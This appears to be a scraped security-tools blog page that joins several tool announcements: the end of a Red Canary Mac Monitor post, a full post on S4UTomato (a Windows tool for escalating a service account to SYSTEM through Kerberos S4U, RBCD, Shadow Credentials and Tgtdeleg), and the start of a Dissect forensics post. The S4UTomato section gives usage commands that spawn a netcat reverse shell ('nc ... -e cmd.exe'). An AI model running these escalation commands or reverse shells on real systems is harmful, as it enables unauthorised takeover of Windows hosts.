href="https://developer.apple.com/documentation/endpointsecurity/3259700-es_new_client#:~:text=The%20user%20does%20this%20in%20the%20Security%20and%20Privacy%20pane%20of%20System%20Preferences%2C%20by%20adding%20the%20app%20to%20Full%20Disk%20Access." rel="nofollow" target="_blank" title="requirement of Endpoint Security"><em>requirement</em> of Endpoint Security</a>.</li> <li>Click the "Start" button in the app and you'll be prompted to reopen the app. 
Done!</li></ul><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgutZE3n5ud3qjGixQYapOjypXrQY8AvNdUONP2MPPUoW4N_7ruLrGtv4A07DriEu691hUvHnVWAemJbPN8vTVckzy8g763hxHrkUG5tRoCFMEV_aOFMavQw5eNp5htdvyYSeHBmnN2f6MJEuJl6IP4hWLV7g695AGOt6MD4xiVHqToNSzUdpq6GqSrgjvo/s3434/mac-monitor_2_Install.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="1928" data-original-width="3434" height="360" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgutZE3n5ud3qjGixQYapOjypXrQY8AvNdUONP2MPPUoW4N_7ruLrGtv4A07DriEu691hUvHnVWAemJbPN8vTVckzy8g763hxHrkUG5tRoCFMEV_aOFMavQw5eNp5htdvyYSeHBmnN2f6MJEuJl6IP4hWLV7g695AGOt6MD4xiVHqToNSzUdpq6GqSrgjvo/w640-h360/mac-monitor_2_Install.png" width="640" /></a></div><p dir="auto"><br /></p> <h3 dir="auto" tabindex="-1">Install footprint</h3> <ul dir="auto"> <li>Event monitor app which establishes an XPC connection to the Security Extension: <code>/Applications/Red Canary Mac Monitor.app</code> w/signing <a href="https://www.kitploit.com/search/label/Identifier" target="_blank" title="identifier">identifier</a> of <code>com.redcanary.agent</code>.</li> <li>Security Extension: <code>/Library/SystemExtensions/../com.redcanary.agent.securityextension.systemextension</code> w/signing identifier of <code>com.redcanary.agent.securityextension.systemextension</code>.</li> </ul> <h2 dir="auto" tabindex="-1">Uninstall</h2> <blockquote> <p dir="auto"><strong>Homebrew?</strong> <code>brew uninstall red-canary-mac-monitor</code>. When using this option you will likely be prompted to authenticate to remove the System Extension.</p> </blockquote> <ul dir="auto"> <li><strong>From the Finder</strong> delete the app and authenticate to remove the System Extension. You can't do this from the Dock. 
It's that easy!</li> <li>You can also <em>just</em> remove the Security Extension if you want, from the app's menu bar or by going into the app settings.</li> <li>(<code>1.0.3</code>) Supports removal using the <code>../Contents/SharedSupport/uninstall.sh</code> script.</li> </ul> <h2 dir="auto" tabindex="-1">How are updates handled?</h2> <blockquote> <p dir="auto"><strong>Homebrew?</strong> <code>brew update && brew upgrade red-canary-mac-monitor</code>. When using this option you will likely be prompted to authenticate to remove the System Extension.</p> </blockquote> <ul dir="auto"> <li>When a new version is available for you to download we'll make a new <a href="https://github.com/redcanaryco/mac-monitor/releases/" rel="nofollow" target="_blank" title="release">release</a>.</li> <li>We'll include updated notes and telemetry summaries (if applicable) for each release.</li> <li>All you, as the end user, will need to do is download the update and run the installer. We'll take care of the rest.</li> </ul> <h2 dir="auto" tabindex="-1">How to use this repository</h2> <p dir="auto">Here we'll be hosting:</p> <ul dir="auto"> <li>The distribution package for easy install. See the <a href="https://github.com/redcanaryco/mac-monitor/releases/" rel="nofollow" target="_blank" title="Releases section"><code>Releases</code> section</a>. Each major build corresponds to a code name. The first of these builds is <code>GoldCardinal</code>.</li> <li>Telemetry reports in <code>Telemetry reports/</code> (i.e. 
all the artifacts that can be collected by the Security Extension).</li> <li>Iconography (what the symbols and colors mean) in <code>Iconography/</code></li> <li>Updated mute set summaries in <code>Mute sets/</code></li> <li><code>AtomicESClient</code> is a separate but very closely related project that shows the ropes of Endpoint Security; check it out in <code>AtomicESClient/</code></li> </ul> <p dir="auto">Additionally, you can submit feature requests and bug reports here as well. When creating a new Issue you'll be able to use one of the two provided templates. Both of these options are also accessible from the in-app "Help" menu.</p> <ul dir="auto"> <li><a href="https://github.com/redcanaryco/mac-monitor/issues/new?assignees=Brandon7CC&labels=rc-mac-feature-request&template=feature_request.md&title=" rel="nofollow" target="_blank" title="Feature request">Feature request</a></li> <li><a href="https://github.com/redcanaryco/mac-monitor/issues/new?assignees=Brandon7CC&labels=rc-mac-bug&template=bug_report.md&title=" rel="nofollow" target="_blank" title="Bug report">Bug report</a></li> </ul> <h2 dir="auto" tabindex="-1">How are releases structured?</h2> <p dir="auto">Each release of Red Canary Mac Monitor has a corresponding build name and version number. The first release has the build name <code>GoldCardinal</code> and version number <code>1.0.1</code>.</p> <h2 dir="auto" tabindex="-1">What are some standout features?</h2> <ul dir="auto"> <li> <p dir="auto"><strong>High fidelity ES events modeled and enriched</strong> with some events containing further enrichment. For example, a process being File Quarantine-aware, a file being quarantined, code signing certificates, etc.</p> </li> <li> <p dir="auto"><strong>Dynamic runtime ES event subscriptions</strong>. 
You have the ability to on-the-fly modify your event subscriptions -- enabling you to cut down on noise while you're working through traces.</p> </li> <li> <p dir="auto"><strong>Path muting at the API level</strong> -- Apple's Endpoint Security team has put a lot of work recently into enabling advanced path muting / inversion capabilities. Here, we cover the majority of the API features: <code>es_mute_path</code> and <code>es_mute_path_events</code> along with the types of <code>ES_MUTE_PATH_TYPE_PREFIX</code>, <code>ES_MUTE_PATH_TYPE_LITERAL</code>, <code>ES_MUTE_PATH_TYPE_TARGET_PREFIX</code>, and <code>ES_MUTE_PATH_TYPE_TARGET_LITERAL</code>. Right now we do not support inversion. <strong>I'd love it if the ES team added inversion on a per-event basis instead of per-client</strong>.</p></li></ul><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjlfEPERQPw64zROwYdlnMaZ15Pt8R4_9PEU_QhU5yrxRiVGPNUQsqEiHREFGhHX_l7C6wOzuWQs-fmtJrUz_DkXCxZc-6fPPnqXvx3sUHUddgcaZ9lyWY4bv6QOpUriDIC5Uk2oNqiRyGU8FXoDUYkH13sEd4GFiXIpd8ffWiwQEBfBSj69J6epsHeBOew/s5422/mac-monitor_3_MuteSubscriptionsOverview.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="3092" data-original-width="5422" height="364" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjlfEPERQPw64zROwYdlnMaZ15Pt8R4_9PEU_QhU5yrxRiVGPNUQsqEiHREFGhHX_l7C6wOzuWQs-fmtJrUz_DkXCxZc-6fPPnqXvx3sUHUddgcaZ9lyWY4bv6QOpUriDIC5Uk2oNqiRyGU8FXoDUYkH13sEd4GFiXIpd8ffWiwQEBfBSj69J6epsHeBOew/w640-h364/mac-monitor_3_MuteSubscriptionsOverview.png" width="640" /></a></div><ul dir="auto"> <li> <p dir="auto"><strong>Detailed event facts</strong>. <strong>Right click on any event</strong> in a table row to access event metadata, filtering, muting, and unsubscribe options. Core to the user experience is the ability to drill down into any given event or set of events. 
To enable this functionality we’ve developed “Event facts” windows which contain metadata / additional <a href="https://www.kitploit.com/search/label/Enrichment" target="_blank" title="enrichment">enrichment</a> about any given event. Each event has a curated set of metadata that is displayed. For example, process execution events will generally contain code signing information, environment variables, correlated events, etc. Below you see examples of file creation and BTM launch item added event facts.</p></li></ul><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgrR7naL44hJJ8WW4i3pPvIDXnt3bZobQTgQeSYgTmohg86L8HELpAawDBmgjq9WeTaFriZIpELtObnglRFdiwoKnx0K07eTuMIowHfmew8DwILIEdmJl7UVeB9FACJXbo5LI9va00RvvVVxEL-6InEBoV2MbMiouNJ1p5Tiw53zg8wZYSqd8wgg7Bj6jyp/s5506/mac-monitor_4_EventFactsOverview.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="3082" data-original-width="5506" height="358" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgrR7naL44hJJ8WW4i3pPvIDXnt3bZobQTgQeSYgTmohg86L8HELpAawDBmgjq9WeTaFriZIpELtObnglRFdiwoKnx0K07eTuMIowHfmew8DwILIEdmJl7UVeB9FACJXbo5LI9va00RvvVVxEL-6InEBoV2MbMiouNJ1p5Tiw53zg8wZYSqd8wgg7Bj6jyp/w640-h358/mac-monitor_4_EventFactsOverview.png" width="640" /></a></div><ul dir="auto"> <li> <p dir="auto"><strong>Event correlation</strong> is an <em>exceptionally</em> important component in any analyst's tool belt. The ability to see which events are "related" to one another enables you to manipulate the telemetry in a way that makes sense (other than simply dumping to JSON or representing an individual event). 
We perform event correlation at the process level -- this means that for any given event (which has an initiating and/or target process) we can deeply link the events that any given process instigated.</p> </li> <li> <p dir="auto"><strong>Process grouping</strong> is another helpful way to represent process telemetry around a given <code>ES_EVENT_TYPE_NOTIFY_EXEC</code> or <code>ES_EVENT_TYPE_NOTIFY_FORK</code> event. By grouping processes in this way you can easily identify the chain of activity.</p> </li> <li> <p dir="auto"><strong>Artifact filtering</strong> enables users to remove (but not destroy) events from view based on: event type, initiating process path, or target process path. This standout feature enables analysts to cut through the noise quickly while still retaining all data.</p> <ul dir="auto"> <li>Lossy filtering (i.e. events that are dropped from the trace) is also available in the form of "dropping platform binaries" -- another useful technique to cut through the noise.</li> </ul> </li> </ul> <p dir="auto"><br /></p><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg9Mbv9sukAYkjHdA5Nz9qfWvKHzLzGZGYx5gBcFq1oo4wP6EyGI7yNJXdjcMShDUbAaQqgEZF4lfUZWjh8QFhUkMBHdpjhrKb835pTIJjDyrZbC3BzqrXRxhRDSM4Jkz8Xz1w0WMqMxM5PAtsL4Cbc7LdIRDVJwJZhyphenhyphencQKOunXVw9vH1L3xblFng6tQHSF/s2990/mac-monitor_5_ArtifactFilteringOverview.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="2990" data-original-width="2848" height="320" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg9Mbv9sukAYkjHdA5Nz9qfWvKHzLzGZGYx5gBcFq1oo4wP6EyGI7yNJXdjcMShDUbAaQqgEZF4lfUZWjh8QFhUkMBHdpjhrKb835pTIJjDyrZbC3BzqrXRxhRDSM4Jkz8Xz1w0WMqMxM5PAtsL4Cbc7LdIRDVJwJZhyphenhyphencQKOunXVw9vH1L3xblFng6tQHSF/s320/mac-monitor_5_ArtifactFilteringOverview.png" width="305" /></a></div><p dir="auto"><br /></p> <ul dir="auto"> 
<li><strong>Telemetry export</strong>. Right now we support pretty JSON and JSONL (one JSON object per line) for the full or partial system trace (keyboard shortcuts too). You can access these options in the menu bar under "Export Telemetry".</li> <li><strong>Process subtree generation</strong>. When viewing the event facts window for any given event we’ll attempt to generate a process lineage subtree in the left hand sidebar. This tree is interactive: click on any process and you’ll be taken to its event facts. <strong>Similarly, you can right click on any process in the tree to pop out the facts for that event</strong>.</li> <li><strong>Dynamic event distribution chart</strong>. This is a fun one enabled by the SwiftUI team. The graph shows the distribution of events you're subscribed to, currently in scope (i.e. not filtered), and with a non-zero count. This enables you to <em>very</em> quickly identify noisy events. The chart auto-shows/hides itself, but you can bring it back with the "Mini-chart" button in the toolbar.</li></ul><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi1nk_iP-0GN8gZPcqzLXeC1o2DzAhfKb2Qwf1pHY-C_We1wS1XulDOsHO1aSKJY77MF3iF0l4CPsl3cXaTvcQaIkt51jf1Rlp1JvRIrfbm93zZT2RYMYKD6C1rfNIeSWg00YtcY00hNS5-gWhrTMvTYGPWUmvbaG5r4StgVH3DDJ1A6DcAPMTjcVeiQ2Rc/s2496/mac-monitor_6_DistributionChart.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="779" data-original-width="2496" height="200" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi1nk_iP-0GN8gZPcqzLXeC1o2DzAhfKb2Qwf1pHY-C_We1wS1XulDOsHO1aSKJY77MF3iF0l4CPsl3cXaTvcQaIkt51jf1Rlp1JvRIrfbm93zZT2RYMYKD6C1rfNIeSWg00YtcY00hNS5-gWhrTMvTYGPWUmvbaG5r4StgVH3DDJ1A6DcAPMTjcVeiQ2Rc/w640-h200/mac-monitor_6_DistributionChart.png" width="640" /></a></div><p dir="auto"><br /></p> <h2 dir="auto" tabindex="-1">Some other features</h2> <ul dir="auto"> 
<li>Another very important feature of any <a href="https://www.kitploit.com/search/label/Dynamic%20Analysis" target="_blank" title="dynamic analysis">dynamic analysis</a> tool is to not let an event limiter or memory inefficient implementation get in the way of the user experience. To address this (the best we currently can) we’ve implemented an <a href="https://www.kitploit.com/search/label/Asynchronous" target="_blank" title="asynchronous">asynchronous</a> parent / child-like <strong>Core Data stack</strong> which stores our events as “entities” in-memory. This enables us to store virtually unlimited events with Mac Monitor. Although, the time of insertions does become more taxing as the event limit gets very large.</li> <li>Since Mac Monitor is based on a Security Extension which is always running in the background (like an EDR sensor) we baked in functionality such that it <strong>does not process events when a system trace is not occurring</strong>. This means that the Red Canary Security Extension (<code>com.redcanary.agent.securityextension</code>) will not needlessly utilize resources / battery power when a trace is not occurring.</li> <li>Distribution package: <strong>The install process is often overlooked</strong>. However, if users do not have a good understanding of what’s being installed or if it’s too complex to install the barrier to entry might be just high enough to dissuade people from using it. This is why we ship Mac Monitor as a notarized distribution package.</li> </ul> <h2 dir="auto" tabindex="-1">Can you open source Mac Monitor?</h2> <p dir="auto">We know how much you would love to learn from the source code and/or build tools or commercial products on top of this. Currently, however, Mac Monitor will be <a href="https://www.kitploit.com/search/label/Distributed" target="_blank" title="distributed">distributed</a> as a free, closed-source tool. Enjoy what's being offered and please continue to provide your great feedback. 
Additionally, never hesitate to reach out if there's one aspect of the implementation you'd love to learn more about. We're an open book when it comes to geeking out about all things implementation, usage, and research methodology.</p> <br /><br /><div style="text-align: center;"><b><span style="font-size: x-large;"><a class="kiploit-download" href="https://github.com/redcanaryco/mac-monitor" rel="nofollow" target="_blank" title="Download Mac-Monitor">Download Mac-Monitor</a></span></b></div><h1>S4UTomato - Escalate Service Account To LocalSystem Via Kerberos</h1><p>Published 2023-10-07</p><p style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/a/AVvXsEj_w1RSjVvWIPM8gX7k6vlskrO4qoENFNWzsNAj5z5435D1ByisnhDyRzrTjc0UsRBtEve_VrA9KL7ILordzre2fUL8sAPUE2gH_VZ75jlTQEtU0Iw3m2LgF7p6VjFutZONF4PeQjl9LHXhdf0QSMzpb3aWspKunN2GFWAFb7wy8-iFHnBRS6u4nTe4xsdG"><img alt="" border="0" height="402" id="BLOGGER_PHOTO_ID_7276663114647162034" src="https://blogger.googleusercontent.com/img/a/AVvXsEj_w1RSjVvWIPM8gX7k6vlskrO4qoENFNWzsNAj5z5435D1ByisnhDyRzrTjc0UsRBtEve_VrA9KL7ILordzre2fUL8sAPUE2gH_VZ75jlTQEtU0Iw3m2LgF7p6VjFutZONF4PeQjl9LHXhdf0QSMzpb3aWspKunN2GFWAFb7wy8-iFHnBRS6u4nTe4xsdG=w640-h402" width="640" /></a></p><p><br /></p> <p dir="auto">Escalate Service Account To LocalSystem via Kerberos.</p> <h1 dir="auto" tabindex="-1">Traditional Potatoes</h1> <p dir="auto">Friends familiar with the "Potato" series of <a href="https://www.kitploit.com/search/label/Privilege%20Escalation" target="_blank" title="privilege escalation">privilege escalation</a> should know that it can elevate service account privileges to local system privileges. 
The early exploitation techniques of "Potato" are almost identical: leveraging certain features of COM interfaces, deceiving the NT AUTHORITY\SYSTEM account into connecting and authenticating to an attacker-controlled RPC server. Then, through a series of API calls, a man-in-the-middle (NTLM relay) attack is executed during this <a href="https://www.kitploit.com/search/label/Authentication" target="_blank" title="authentication">authentication</a> process, resulting in the generation of an <a href="https://www.kitploit.com/search/label/Access%20Token" target="_blank" title="access token">access token</a> for the NT AUTHORITY\SYSTEM account on the local system. Finally, this token is stolen, and the <code>CreateProcessWithToken()</code> or <code>CreateProcessAsUser()</code> function is used to pass the token and create a new process to obtain SYSTEM privileges.</p><p dir="auto"><br /></p> <h1 dir="auto" tabindex="-1">How About Kerberos</h1> <p dir="auto">In any scenario where a machine is joined to a domain, you can leverage the aforementioned techniques for local privilege escalation as long as you can run code under the context of a Windows service account or a Microsoft virtual account, provided that the <a href="https://www.kitploit.com/search/label/Active%20Directory" target="_blank" title="Active Directory">Active Directory</a> hasn't been hardened to fully defend against such attacks.</p> <p dir="auto">In a Windows domain environment, SYSTEM, NT AUTHORITY\NETWORK SERVICE, and Microsoft virtual accounts authenticate on the network using the account of the domain-joined computer. Understanding this is crucial because in modern versions of Windows, most Windows services run by default using Microsoft virtual accounts. Notably, IIS and MSSQL use these virtual accounts, and I believe other applications might also employ them. 
Therefore, we can abuse the S4U extension to obtain a service ticket for the domain administrator account "Administrator" on the local machine. Then, with the help of James Forshaw (<a href="https://twitter.com/tiraniddo" rel="nofollow" target="_blank" title="@tiraniddo">@tiraniddo</a>)'s <a href="https://gist.github.com/tyranid/c24cfd1bd141d14d4925043ee7e03c82" rel="nofollow" target="_blank" title="SCMUACBypass"><em>SCMUACBypass</em></a>, we can use that ticket to create a system service and gain SYSTEM privileges. This achieves the same effect as traditional methods used in the "Potato" family of privilege escalation techniques.</p> <p dir="auto">Before this, we need to obtain a TGT (Ticket Granting Ticket) for the local machine account. This is not easy because the restrictions imposed by service account permissions prevent us from obtaining the computer's long-term key, so we cannot construct a KRB_AS_REQ request ourselves. To accomplish this goal, I leveraged three techniques: <a href="https://shenaniganslabs.io/2019/01/28/Wagging-the-Dog.html" rel="nofollow" target="_blank" title="Resource-based Constrained Delegation"><em>Resource-based Constrained Delegation</em></a>, <a href="https://posts.specterops.io/shadow-credentials-abusing-key-trust-account-mapping-for-takeover-8ee1a53566ab" rel="nofollow" target="_blank" title="Shadow Credentials"><em>Shadow Credentials</em></a>, and <a href="https://twitter.com/gentilkiwi/status/998219775485661184" rel="nofollow" target="_blank" title="Tgtdeleg"><em>Tgtdeleg</em></a>. 
I built my project based on the <a href="https://github.com/GhostPack/Rubeus#tgtdeleg" rel="nofollow" target="_blank" title="Rubeus">Rubeus</a> toolset.</p> <h1 dir="auto" tabindex="-1">How to Use and Examples</h1> <div class="highlight highlight-source-batchfile notranslate position-relative overflow-auto" controller="" data-snippet-clipboard-copy-content="C:\Users\whoami\Desktop>S4UTomato.exe --help S4UTomato 1.0.0-beta Copyright (c) 2023 -d, --Domain Domain (FQDN) to authenticate to. -s, --Server Host name of <a title=" domain="" href="https://www.kitploit.com/search/label/Domain%20Controller">domain controller or LDAP server. -m, --ComputerName The new computer account to create. -p, --ComputerPassword The password of the new computer account to be created. -f, --Force Forcefully update the 'msDS-KeyCredentialLink' attribute of the computer object. -c, --Command Program to run. -v, --Verbose Output verbose debug information. --help Display this help screen. --version Display version information." 
dir="auto"><pre><code>C:\Users\whoami\Desktop>S4UTomato.exe --help<br /><br />S4UTomato 1.0.0-beta<br />Copyright (c) 2023<br /><br /> -d, --Domain Domain (FQDN) to authenticate to.<br /> -s, --Server Host name of domain controller or LDAP server.<br /> -m, --ComputerName The new computer account to create.<br /> -p, --ComputerPassword The password of the new computer account to be created.<br /> -f, --Force Forcefully update the 'msDS-KeyCredentialLink' attribute of the computer<br /> object.<br /> -c, --Command Program to run.<br /> -v, --Verbose Output verbose debug information.<br /> --help Display this help screen.<br /> --version Display version information.</code></pre></div> <h3 dir="auto" tabindex="-1">LEP via Resource-based Constrained Delegation</h3> <div><pre><code>S4UTomato.exe rbcd -m NEWCOMPUTER -p pAssw0rd -c "nc.exe 127.0.0.1 4444 -e cmd.exe"</code></pre></div> <p dir="auto" style="text-align: center;"><a href="https://github.com/wh0amitz/S4UTomato/blob/master/images/rbcd.gif" rel="nofollow" target="_blank" title="Escalate Service Account To LocalSystem via Kerberos (11)"></a><a href="https://blogger.googleusercontent.com/img/a/AVvXsEj_w1RSjVvWIPM8gX7k6vlskrO4qoENFNWzsNAj5z5435D1ByisnhDyRzrTjc0UsRBtEve_VrA9KL7ILordzre2fUL8sAPUE2gH_VZ75jlTQEtU0Iw3m2LgF7p6VjFutZONF4PeQjl9LHXhdf0QSMzpb3aWspKunN2GFWAFb7wy8-iFHnBRS6u4nTe4xsdG"><img alt="" border="0" height="402" id="BLOGGER_PHOTO_ID_7276663114647162034" src="https://blogger.googleusercontent.com/img/a/AVvXsEj_w1RSjVvWIPM8gX7k6vlskrO4qoENFNWzsNAj5z5435D1ByisnhDyRzrTjc0UsRBtEve_VrA9KL7ILordzre2fUL8sAPUE2gH_VZ75jlTQEtU0Iw3m2LgF7p6VjFutZONF4PeQjl9LHXhdf0QSMzpb3aWspKunN2GFWAFb7wy8-iFHnBRS6u4nTe4xsdG=w640-h402" width="640" /></a></p> <h3 dir="auto" tabindex="-1">LEP via Shadow Credentials + S4U2self</h3> <div><pre><code>S4UTomato.exe shadowcred -c "nc 127.0.0.1 4444 -e cmd.exe" -f</code></pre></div> <p dir="auto" style="text-align: center;"><a 
href="https://github.com/wh0amitz/S4UTomato/blob/master/images/shadowcred.gif" rel="nofollow" target="_blank" title="Escalate Service Account To LocalSystem via Kerberos (12)"></a><a href="https://blogger.googleusercontent.com/img/a/AVvXsEiZOSMk2ScPioTG4sGY-D3XB2JTpb09h6cojWgsncObtUrJ8cKcCUqGYPpR_R25LEa5EDP9iC1U-Fr3ea8GX43w7LGr-w5a02AEAY59d83mN4KjvCDBSWaopFpGkqcEaYt7_3Rkjgf2UqNDRvh69LsG5iYuCJ-nvU60xZhuDrsbnaY_FWYZ_Hi3eH5yjAyb"><img alt="" border="0" height="402" id="BLOGGER_PHOTO_ID_7276663135301303442" src="https://blogger.googleusercontent.com/img/a/AVvXsEiZOSMk2ScPioTG4sGY-D3XB2JTpb09h6cojWgsncObtUrJ8cKcCUqGYPpR_R25LEa5EDP9iC1U-Fr3ea8GX43w7LGr-w5a02AEAY59d83mN4KjvCDBSWaopFpGkqcEaYt7_3Rkjgf2UqNDRvh69LsG5iYuCJ-nvU60xZhuDrsbnaY_FWYZ_Hi3eH5yjAyb=w640-h402" width="640" /></a></p> <h3 dir="auto" tabindex="-1">LEP via Tgtdeleg + S4U2self</h3> <div class="highlight highlight-source-batchfile notranslate position-relative overflow-auto" dir="auto"><pre><code># First retrieve the TGT through Tgtdeleg<br />S4UTomato.exe tgtdeleg<br /># Then run SCMUACBypass to obtain SYSTEM privilege<br />S4UTomato.exe krbscm -c "nc 127.0.0.1 4444 -e cmd.exe"</code></pre></div> <p dir="auto" style="text-align: center;"><a href="https://github.com/wh0amitz/S4UTomato/blob/master/images/tgtdeleg.gif" rel="nofollow" target="_blank" title="Escalate Service Account To LocalSystem via Kerberos (13)"></a><a href="https://blogger.googleusercontent.com/img/a/AVvXsEg3HZLvI8PYEkmyEaXyXapvcUQPoGaht5SqfLRAl39IAiDQWWE5Ik6HliE8wT7LLCXXyqHYaKRe5g9Owp1GUVkv3ZTEidgSnrMyJBSFoDZfL3yog2x4mqnMzFq4u1hDbNolJkYVB5wEGEOdOt-H9pdZo_yitsWggET_4iE37OBmo7CWOKJvxGz7unQBz8Ev"><img alt="" border="0" height="402" id="BLOGGER_PHOTO_ID_7276663151477587410" 
src="https://blogger.googleusercontent.com/img/a/AVvXsEg3HZLvI8PYEkmyEaXyXapvcUQPoGaht5SqfLRAl39IAiDQWWE5Ik6HliE8wT7LLCXXyqHYaKRe5g9Owp1GUVkv3ZTEidgSnrMyJBSFoDZfL3yog2x4mqnMzFq4u1hDbNolJkYVB5wEGEOdOt-H9pdZo_yitsWggET_4iE37OBmo7CWOKJvxGz7unQBz8Ev=w640-h402" width="640" /></a></p> <br /><br /><div style="text-align: center;"><b><span style="font-size: x-large;"><a class="kiploit-download" href="https://github.com/wh0amitz/S4UTomato" rel="nofollow" target="_blank" title="Download S4UTomato">Download S4UTomato</a></span></b></div>Unknownnoreply@blogger.comtag:blogger.com,1999:blog-8317222231133660547.post-12682939146510661732023-10-05T08:30:00.006-03:002023-10-05T08:30:00.145-03:00Dissect - Digital Forensics, Incident Response Framework And Toolset That Allows You To Quickly Access And Analyse Forensic Artefacts From Various Disk And File Formats<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjZF_5oDRO9kh5fL8bdtP-5BaxB7Oec6uTmO25bsTlnUysYRsSuXtvxeevnNjRf19Ypudm1tqTV8IBA1IYIsw-ijpzSENIlrrq0Pye4GCEICjk_eECfeSHhOgOj-M-_s4xyWGW689o-_wRJAHIF0HcRJCed5mOx6CHtK9n0abbl6CCwmaOB1ccDj5pgTesH/s656/h144.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="398" data-original-width="656" height="388" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjZF_5oDRO9kh5fL8bdtP-5BaxB7Oec6uTmO25bsTlnUysYRsSuXtvxeevnNjRf19Ypudm1tqTV8IBA1IYIsw-ijpzSENIlrrq0Pye4GCEICjk_eECfeSHhOgOj-M-_s4xyWGW689o-_wRJAHIF0HcRJCed5mOx6CHtK9n0abbl6CCwmaOB1ccDj5pgTesH/w640-h388/h144.png" width="640" /></a></div><div><br /></div> <p dir="auto">Dissect is a <a href="https://www.kitploit.com/search/label/Digital%20Forensics" target="_blank" title="digital forensics">digital forensics</a> & <a href="https://www.kitploit.com/search/label/Incident%20Response" target="_blank" title="incident response">incident response</a> framework and toolset that allows you to quickly 
access and analyse forensic artefacts from various disk and file formats, developed by Fox-IT (part of NCC Group).</p> <p dir="auto">This project is a meta package: it installs all other Dissect modules in the right combination of versions. For more information, please see <a href="https://docs.dissect.tools/" rel="nofollow" target="_blank" title="the documentation">the documentation</a>.</p><span><a name='more'></a></span><p dir="auto"><br /></p> <h2 dir="auto" tabindex="-1">What is Dissect?</h2> <p dir="auto">Dissect is an incident response framework built from various parsers and implementations of file formats. Tying this all together, Dissect allows you to work with tools named <code>target-query</code> and <code>target-shell</code> to quickly gain access to forensic artefacts such as Runkeys, Prefetch files and Windows Event Logs, just to name a few!</p> <p dir="auto"><strong>Singular approach</strong></p> <p dir="auto">And the best thing: all in a singular way, regardless of the underlying container (E01, VMDK, QCoW), <a href="https://www.kitploit.com/search/label/Filesystem" target="_blank" title="filesystem">filesystem</a> (NTFS, ExtFS, FFS) or operating system (Windows, Linux, ESXi), in any structure or combination. You no longer have to bother with <a href="https://www.kitploit.com/search/label/Extracting%20Files" target="_blank" title="extracting files">extracting files</a> from your forensic container, mounting them (in the case of VMDKs and such), retrieving the MFT and parsing it with a separate tool, only to finally create a timeline to analyse. This is all handled under the hood by Dissect in a user-friendly manner.</p> <p dir="auto">Taking the example above, you can start analysing parsed MFT entries with a single command like <code>target-query -f mft &lt;PATH_TO_YOUR_IMAGE&gt;</code>!</p> <p dir="auto"><strong>Create a lightweight container using Acquire</strong></p> <p dir="auto">Dissect also provides you with a tool called <code>acquire</code>. 
You can deploy this tool on endpoint(s) to create a lightweight container of these machine(s). It is also convenient that you can deploy <code>acquire</code> on a hypervisor to quickly create lightweight <a href="https://www.kitploit.com/search/label/Containers" target="_blank" title="containers">containers</a> of all the (running) virtual machines on it, all without having to worry about file locks. These lightweight containers can then be analysed using tools like <code>target-query</code> and <code>target-shell</code>, but feel free to use other tools as well.</p> <p dir="auto"><strong>A modular setup</strong></p> <p dir="auto">Dissect is made with a modular approach in mind. This means that each individual project can be used on its own (or in combination) to create a completely new tool for your engagement or future use!</p> <p dir="auto"><strong>Try it out now!</strong></p> <p dir="auto">Interested in trying it out for yourself? You can simply <code>pip install dissect</code> and start using the <code>target-*</code> tooling right away. Or you can use the interactive playground at <a href="https://try.dissect.tools" rel="nofollow" target="_blank" title="https://try.dissect.tools">https://try.dissect.tools</a> to try Dissect in your browser.</p> <p dir="auto">Don’t know where to start? Check out the <a href="https://docs.dissect.tools/en/latest/usage/introduction.html" rel="nofollow" target="_blank" title="introduction page">introduction page</a>.</p> <p dir="auto">Want to get a detailed overview? Check out the <a href="https://docs.dissect.tools/en/latest/overview/" rel="nofollow" target="_blank" title="overview page">overview page</a>.</p> <p dir="auto">Want to read everything? 
Check out the <a href="https://docs.dissect.tools" rel="nofollow" target="_blank" title="documentation">documentation</a>.</p> <h2 dir="auto" tabindex="-1">Projects</h2> <p dir="auto">Dissect currently consists of the following projects.</p> <ul dir="auto"> <li><a href="https://github.com/fox-it/dissect.cim" rel="nofollow" target="_blank" title="dissect.cim">dissect.cim</a></li> <li><a href="https://github.com/fox-it/dissect.clfs" rel="nofollow" target="_blank" title="dissect.clfs">dissect.clfs</a></li> <li><a href="https://github.com/fox-it/dissect.cstruct" rel="nofollow" target="_blank" title="dissect.cstruct">dissect.cstruct</a></li> <li><a href="https://github.com/fox-it/dissect.esedb" rel="nofollow" target="_blank" title="dissect.esedb">dissect.esedb</a></li> <li><a href="https://github.com/fox-it/dissect.etl" rel="nofollow" target="_blank" title="dissect.etl">dissect.etl</a></li> <li><a href="https://github.com/fox-it/dissect.eventlog" rel="nofollow" target="_blank" title="dissect.eventlog">dissect.eventlog</a></li> <li><a href="https://github.com/fox-it/dissect.evidence" rel="nofollow" target="_blank" title="dissect.evidence">dissect.evidence</a></li> <li><a href="https://github.com/fox-it/dissect.executable" rel="nofollow" target="_blank" title="dissect.executable">dissect.executable</a></li> <li><a href="https://github.com/fox-it/dissect.extfs" rel="nofollow" target="_blank" title="dissect.extfs">dissect.extfs</a></li> <li><a href="https://github.com/fox-it/dissect.fat" rel="nofollow" 